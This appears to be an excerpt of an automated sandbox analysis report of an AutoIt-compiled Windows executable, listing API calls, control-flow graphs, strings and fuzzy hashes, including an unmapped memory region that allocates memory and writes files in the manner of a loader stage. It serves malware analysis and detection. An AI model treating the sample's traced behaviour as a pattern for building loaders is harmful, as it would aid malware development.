                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
                                                                    • Instruction ID: 10b8eb8acc8ca9caaeb9ef188132feacdf9591571d31db7c881b075746acef0a
                                                                    • Opcode Fuzzy Hash: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
                                                                    • Instruction Fuzzy Hash: CC21F2B1901309AFDB21DFA5E888BDEBBF4FB08700F04411AF990EA284D7BA4544CF91

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00FD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010952F8,?,00FD37AE,?), ref: 00FD4724
                                                                      • Part of subcall function 00FF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FD7165), ref: 00FF052D
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FD71A8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0100E8C8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0100E909
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0100E947
                                                                    • _wcscat.LIBCMT ref: 0100E9A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 2673923337-2727554177
                                                                    • Opcode ID: ec41f808f33f8068006e83db82a5c0b77d74f6f47de177791343c8aa2892e64c
                                                                    • Instruction ID: 6cd8318e04387cb538c39430f91f7e35840444153a8ae3f224258e18b0ab982c
                                                                    • Opcode Fuzzy Hash: ec41f808f33f8068006e83db82a5c0b77d74f6f47de177791343c8aa2892e64c
                                                                    • Instruction Fuzzy Hash: 4F71BE714083019ED314EF69EC618AFBBE8FF84350F44096EF5C5972A0EB7A9948DB52

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
                                                                    • LoadIconW.USER32(00000063), ref: 00FD3A76
                                                                    • LoadIconW.USER32(000000A4), ref: 00FD3A88
                                                                    • LoadIconW.USER32(000000A2), ref: 00FD3A9A
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
                                                                    • RegisterClassExW.USER32(?), ref: 00FD3B16
                                                                      • Part of subcall function 00FD3041: GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                      • Part of subcall function 00FD3041: RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                      • Part of subcall function 00FD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                      • Part of subcall function 00FD3041: InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                      • Part of subcall function 00FD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                      • Part of subcall function 00FD3041: LoadIconW.USER32(000000A9), ref: 00FD30F2
                                                                      • Part of subcall function 00FD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
                                                                    • Instruction ID: 22bcbe252727479a2c12996d996a1519d05a1cf344d441912e16720444f252bf
                                                                    • Opcode Fuzzy Hash: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
                                                                    • Instruction Fuzzy Hash: E6216870D00308AFEB22DFA5EC19B9E7BB1FB09711F00019AF680A6295D3BE56409F90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 767 fd3633-fd3681 769 fd36e1-fd36e3 767->769 770 fd3683-fd3686 767->770 769->770 771 fd36e5 769->771 772 fd3688-fd368f 770->772 773 fd36e7 770->773 774 fd36ca-fd36d2 DefWindowProcW 771->774 777 fd374b-fd3753 PostQuitMessage 772->777 778 fd3695-fd369a 772->778 775 fd36ed-fd36f0 773->775 776 100d0cc-100d0fa call fe1070 call fe1093 773->776 780 fd36d8-fd36de 774->780 781 fd3715-fd373c SetTimer RegisterWindowMessageW 775->781 782 fd36f2-fd36f3 775->782 810 100d0ff-100d106 776->810 779 fd3711-fd3713 777->779 784 100d154-100d168 call 1032527 778->784 785 fd36a0-fd36a2 778->785 779->780 781->779 790 fd373e-fd3749 CreatePopupMenu 781->790 787 fd36f9-fd370c KillTimer call fd443a call fd3114 782->787 788 100d06f-100d072 782->788 784->779 804 100d16e 784->804 791 fd36a8-fd36ad 785->791 792 fd3755-fd3764 call fd44a0 785->792 787->779 797 100d074-100d076 788->797 798 100d0a8-100d0c7 MoveWindow 788->798 790->779 793 100d139-100d140 791->793 794 fd36b3-fd36b8 791->794 792->779 793->774 809 100d146-100d14f call 1027c36 793->809 802 fd36be-fd36c4 794->802 803 100d124-100d134 call 1032d36 794->803 806 100d097-100d0a3 SetFocus 797->806 807 100d078-100d07b 797->807 798->779 802->774 802->810 803->779 804->774 806->779 807->802 811 100d081-100d092 call fe1070 807->811 809->774 810->774 815 100d10c-100d11f call fd443a call fd434a 810->815 811->779 815->774
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FD36D2
                                                                    • KillTimer.USER32(?,00000001), ref: 00FD36FC
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD371F
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD372A
                                                                    • CreatePopupMenu.USER32 ref: 00FD373E
                                                                    • PostQuitMessage.USER32(00000000), ref: 00FD374D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
                                                                    • Instruction ID: 215d76d17c7acd69c776c18bcc1fd7f7384f6d4696dc200abdbcae627cb625c2
                                                                    • Opcode Fuzzy Hash: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
                                                                    • Instruction Fuzzy Hash: 68411A73504506BBEB21AFA9DC19F7A3B96FB01310F180117F781963D5CA7A9A40B763

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                    • API String ID: 1825951767-3513169116
                                                                    • Opcode ID: 2b5c7089ccbf54912c6376ac6c47e7b7aaa4d6a3ccef2120e4d15cdc7ece1723
                                                                    • Instruction ID: 16e171579446a9648f85f7fdd5ea1bb0ac2c8d0e4b3d1f40a084d66fab06581d
                                                                    • Opcode Fuzzy Hash: 2b5c7089ccbf54912c6376ac6c47e7b7aaa4d6a3ccef2120e4d15cdc7ece1723
                                                                    • Instruction Fuzzy Hash: CBA18E7290021D9ADF05EBE4DC51AEEB77ABF15300F48001BF551B7291EF789A08EB61

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1009 1581a98-1581aea call 1581998 CreateFileW 1012 1581aec-1581aee 1009->1012 1013 1581af3-1581b00 1009->1013 1014 1581c4c-1581c50 1012->1014 1016 1581b02-1581b0e 1013->1016 1017 1581b13-1581b2a VirtualAlloc 1013->1017 1016->1014 1018 1581b2c-1581b2e 1017->1018 1019 1581b33-1581b59 CreateFileW 1017->1019 1018->1014 1021 1581b5b-1581b78 1019->1021 1022 1581b7d-1581b97 ReadFile 1019->1022 1021->1014 1023 1581b99-1581bb6 1022->1023 1024 1581bbb-1581bbf 1022->1024 1023->1014 1025 1581be0-1581bf7 WriteFile 1024->1025 1026 1581bc1-1581bde 1024->1026 1029 1581bf9-1581c20 1025->1029 1030 1581c22-1581c47 CloseHandle VirtualFree 1025->1030 1026->1014 1029->1014 1030->1014
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01581ADD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                    • Instruction ID: 2f2cccd4f59e3e46a5475b93f568d43013c2718222b948e6a9b88ab4f140ae38
                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                    • Instruction Fuzzy Hash: 0751F875A50208FFEB24EFA4CC89FDE77B8BF48701F108954F60AEE180DA7496458B64

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1049 fd39d5-fd3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FD3A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
                                                                    • Instruction ID: 51321c616cf9d3810b4b106fee73c371097a5760ae665530d0f76bc7e8c81661
                                                                    • Opcode Fuzzy Hash: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
                                                                    • Instruction Fuzzy Hash: A8F03A705002947EEB325623AC18E2B2E7DF7CBF50B00005EB940E2194C26A1800CBB0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1050 fd407c-fd4092 1051 fd416f-fd4173 1050->1051 1052 fd4098-fd40ad call fd7a16 1050->1052 1055 100d3c8-100d3d7 LoadStringW 1052->1055 1056 fd40b3-fd40d3 call fd7bcc 1052->1056 1059 100d3e2-100d3fa call fd7b2e call fd6fe3 1055->1059 1056->1059 1061 fd40d9-fd40dd 1056->1061 1068 fd40ed-fd416a call ff2de0 call fd454e call ff2dbc Shell_NotifyIconW call fd5904 1059->1068 1072 100d400-100d41e call fd7cab call fd6fe3 call fd7cab 1059->1072 1063 fd4174-fd417d call fd8047 1061->1063 1064 fd40e3-fd40e8 call fd7b2e 1061->1064 1063->1068 1064->1068 1068->1051 1072->1068
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0100D3D7
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • _memset.LIBCMT ref: 00FD40FC
                                                                    • _wcscpy.LIBCMT ref: 00FD4150
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 3942752672-1585850449
                                                                    • Opcode ID: 3b3b165b3991d8740b0222d2548cef28e2bbbfc8eed8809323dcadae12a28916
                                                                    • Instruction ID: 58226cc73921883e485d19b397d9faa0a7a386fc1273ae0e478b780d7fca27a0
                                                                    • Opcode Fuzzy Hash: 3b3b165b3991d8740b0222d2548cef28e2bbbfc8eed8809323dcadae12a28916
                                                                    • Instruction Fuzzy Hash: 2C31D071008304AFD732EB60DC49BEB77E9AF44310F18451FF6C596291EB79A648D792

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1085 ff541d-ff5436 1086 ff5438-ff543d 1085->1086 1087 ff5453 1085->1087 1086->1087 1088 ff543f-ff5441 1086->1088 1089 ff5455-ff545b 1087->1089 1090 ff545c-ff5461 1088->1090 1091 ff5443-ff5448 call ff8b28 1088->1091 1093 ff546f-ff5473 1090->1093 1094 ff5463-ff546d 1090->1094 1103 ff544e call ff8db6 1091->1103 1095 ff5475-ff5480 call ff2de0 1093->1095 1096 ff5483-ff5485 1093->1096 1094->1093 1098 ff5493-ff54a2 1094->1098 1095->1096 1096->1091 1100 ff5487-ff5491 1096->1100 1101 ff54a9 1098->1101 1102 ff54a4-ff54a7 1098->1102 1100->1091 1100->1098 1105 ff54ae-ff54b3 1101->1105 1102->1105 1103->1087 1107 ff559c-ff559f 1105->1107 1108 ff54b9-ff54c0 1105->1108 1107->1089 1109 ff54c2-ff54ca 1108->1109 1110 ff5501-ff5503 1108->1110 1109->1110 1113 ff54cc 1109->1113 1111 ff556d-ff556e call 1000ba7 1110->1111 1112 ff5505-ff5507 1110->1112 1120 ff5573-ff5577 1111->1120 1115 ff552b-ff5536 1112->1115 1116 ff5509-ff5511 1112->1116 1117 ff55ca 1113->1117 1118 ff54d2-ff54d4 1113->1118 1123 ff553a-ff553d 1115->1123 1124 ff5538 1115->1124 1121 ff5513-ff551f 1116->1121 1122 ff5521-ff5525 1116->1122 1119 ff55ce-ff55d7 1117->1119 1125 ff54db-ff54e0 1118->1125 1126 ff54d6-ff54d8 1118->1126 1119->1089 1120->1119 1127 ff5579-ff557e 1120->1127 1128 ff5527-ff5529 1121->1128 1122->1128 1129 ff553f-ff554b call ff46e6 call 1000e5b 1123->1129 1130 ff55a4-ff55a8 1123->1130 1124->1123 1125->1130 1131 ff54e6-ff54ff call 1000cc8 1125->1131 1126->1125 1127->1130 1133 ff5580-ff5591 1127->1133 1128->1123 1146 ff5550-ff5555 1129->1146 1134 ff55ba-ff55c5 call ff8b28 1130->1134 1135 ff55aa-ff55b7 call ff2de0 1130->1135 1143 ff5562-ff556b 1131->1143 1138 ff5594-ff5596 1133->1138 1134->1103 1135->1134 1138->1107 1138->1108 1143->1138 1147 ff55dc-ff55e0 1146->1147 1148 ff555b-ff555e 1146->1148 1147->1119 1148->1117 1149 ff5560 1148->1149 1149->1143
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1559183368-0
                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                    • Instruction ID: 8e3c53bc85051513789cc705c6555c96c264506bc80d1104c20213b8254d779e
                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                    • Instruction Fuzzy Hash: D151A671E00B0D9BDB24CEA9DC4067E77A2AF40B35F2C8629FB25962E0D7709D51AB40

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1150 fd686a-fd6891 call fd4ddd 1153 100e031-100e041 call 103955b 1150->1153 1154 fd6897-fd68a5 call fd4ddd 1150->1154 1157 100e046-100e048 1153->1157 1154->1153 1161 fd68ab-fd68b1 1154->1161 1159 100e067-100e0af call ff0db6 1157->1159 1160 100e04a-100e04d call fd4e4a 1157->1160 1170 100e0b1-100e0bb 1159->1170 1171 100e0d4 1159->1171 1164 100e052-100e061 call 10342f8 1160->1164 1161->1164 1165 fd68b7-fd68d9 call fd6a8c 1161->1165 1164->1159 1174 100e0cf-100e0d0 1170->1174 1173 100e0d6-100e0e9 1171->1173 1175 100e260-100e263 call ff2d55 1173->1175 1176 100e0ef 1173->1176 1177 100e0d2 1174->1177 1178 100e0bd-100e0cc 1174->1178 1182 100e268-100e271 call fd4e4a 1175->1182 1179 100e0f6-100e0f9 call fd7480 1176->1179 1177->1173 1178->1174 1183 100e0fe-100e120 call fd5db2 call 10373e9 1179->1183 1187 100e273-100e283 call fd7616 call fd5d9b 1182->1187 1194 100e122-100e12f 1183->1194 1195 100e134-100e13e call 10373d3 1183->1195 1201 100e288-100e2b8 call 102f7a1 call ff0e2c call ff2d55 call fd4e4a 1187->1201 1197 100e227-100e237 call fd750f 1194->1197 1203 100e140-100e153 1195->1203 1204 100e158-100e162 call 10373bd 1195->1204 1197->1183 1206 100e23d-100e247 call fd735d 1197->1206 1201->1187 1203->1197 1211 100e164-100e171 1204->1211 1212 100e176-100e180 call fd5e2a 1204->1212 1214 100e24c-100e25a 1206->1214 1211->1197 1212->1197 1219 100e186-100e19e call 102f73d 1212->1219 1214->1175 1214->1179 1225 100e1a0-100e1bf call fd7de1 call fd5904 1219->1225 1226 100e1c1-100e1c4 1219->1226 1251 100e1e2-100e1f0 call fd5db2 1225->1251 1227 100e1f2-100e1f5 1226->1227 1228 100e1c6-100e1e1 call fd7de1 call fd6839 call fd5904 1226->1228 1232 100e215-100e218 call 103737f 1227->1232 1233 100e1f7-100e200 call 102f65e 1227->1233 1228->1251 1238 100e21d-100e226 call ff0e2c 1232->1238 1233->1201 1244 100e206-100e210 call ff0e2c 1233->1244 1238->1197 1244->1183 1251->1238
                                                                    APIs
                                                                      • Part of subcall function 00FD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F
                                                                    • _free.LIBCMT ref: 0100E263
                                                                    • _free.LIBCMT ref: 0100E2AA
                                                                      • Part of subcall function 00FD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 2861923089-1757145024
                                                                    • Opcode ID: 6d85cdb2c99acd0c27934de5444de411d171f2f567afca83b1d193f2019014ad
                                                                    • Instruction ID: f5b60ee55ce9d81ac3bb4dafec20a87d34e89a32f0fb1470c438ea02d8aa6765
                                                                    • Opcode Fuzzy Hash: 6d85cdb2c99acd0c27934de5444de411d171f2f567afca83b1d193f2019014ad
                                                                    • Instruction Fuzzy Hash: 92918D7190021AAFDF05EFA8CC819EEB7B5FF14310F04486AF995BB2A1DB34A945DB50
                                                                    APIs
                                                                      • Part of subcall function 01583458: Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0158368B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 6F5PU1YHL6XWM9JCGEUWU
                                                                    • API String ID: 2694422964-1971696249
                                                                    • Opcode ID: b358c5eb81b2c26263b6bdaf7012897f583b56bd25eaaf3a39a58b45bfb84aba
                                                                    • Instruction ID: b4d4634ec16f2ab99c0f28c1d9869cf4b82e8529f0da107b48950159a40378ee
                                                                    • Opcode Fuzzy Hash: b358c5eb81b2c26263b6bdaf7012897f583b56bd25eaaf3a39a58b45bfb84aba
                                                                    • Instruction Fuzzy Hash: A851C670D04249DBEF11EBA8C958BEFBBB4BF15704F004599E6087B2C1D6794B04CBA1
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FD35A1,SwapMouseButtons,00000004,?), ref: 00FD35D4
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD35F5
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD3617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
